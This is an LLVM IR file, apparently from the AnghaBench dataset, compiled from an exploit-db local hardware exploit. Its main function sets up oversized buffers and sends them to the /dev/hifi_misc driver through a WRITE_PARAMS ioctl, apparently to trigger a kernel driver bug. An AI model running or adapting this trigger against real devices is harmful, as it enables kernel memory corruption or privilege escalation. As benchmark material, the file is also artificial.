; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/hardware/local/extr_44306.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/hardware/local/extr_44306.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

%struct.misc_io_sync_param = type { i32, i32, i8*, i8* }

@.str = private unnamed_addr constant [15 x i8] c"/dev/hifi_misc\00", align 1
@O_RDWR = common dso_local global i32 0, align 4
@HIFI_MISC_IOCTL_WRITE_PARAMS = common dso_local global i32 0, align 4

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main(i32 %0, i8** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  %5 = alloca i8**, align 8
  %6 = alloca i32, align 4
  %7 = alloca i8*, align 8
  %8 = alloca i8*, align 8
  %9 = alloca %struct.misc_io_sync_param, align 8
  store i32 0, i32* %3, align 4
  store i32 %0, i32* %4, align 4
  store i8** %1, i8*** %5, align 8
  %10 = call i8* @malloc(i32 307200)
  store i8* %10, i8** %7, align 8
  %11 = call i8* @malloc(i32 100)
  store i8* %11, i8** %8, align 8
  %12 = load i8*, i8** %7, align 8
  %13 = getelementptr inbounds %struct.misc_io_sync_param, %struct.misc_io_sync_param* %9, i32 0, i32 3
  store i8* %12, i8** %13, align 8
  %14 = getelementptr inbounds %struct.misc_io_sync_param, %struct.misc_io_sync_param* %9, i32 0, i32 0
  store i32 307200, i32* %14, align 8
  %15 = load i8*, i8** %8, align 8
  %16 = getelementptr inbounds %struct.misc_io_sync_param, %struct.misc_io_sync_param* %9, i32 0, i32 2
  store i8* %15, i8** %16, align 8
  %17 = getelementptr inbounds %struct.misc_io_sync_param, %struct.misc_io_sync_param* %9, i32 0, i32 1
  store i32 100, i32* %17, align 4
  %18 = load i32, i32* @O_RDWR, align 4
  %19 = call i32 @open(i8* getelementptr inbounds ([15 x i8], [15 x i8]* @.str, i64 0, i64 0), i32 %18)
  store i32 %19, i32* %6, align 4
  %20 = load i32, i32* %6, align 4
  %21 = load i32, i32* @HIFI_MISC_IOCTL_WRITE_PARAMS, align 4
  %22 = call i32 @ioctl(i32 %20, i32 %21, %struct.misc_io_sync_param* %9)
  %23 = load i8*, i8** %7, align 8
  %24 = call i32 @free(i8* %23)
  %25 = load i8*, i8** %8, align 8
  %26 = call i32 @free(i8* %25)
  ret i32 0
}

declare dso_local i8* @malloc(i32) #1

declare dso_local i32 @open(i8*, i32) #1

declare dso_local i32 @ioctl(i32, i32, %struct.misc_io_sync_param*) #1

declare dso_local i32 @free(i8*) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
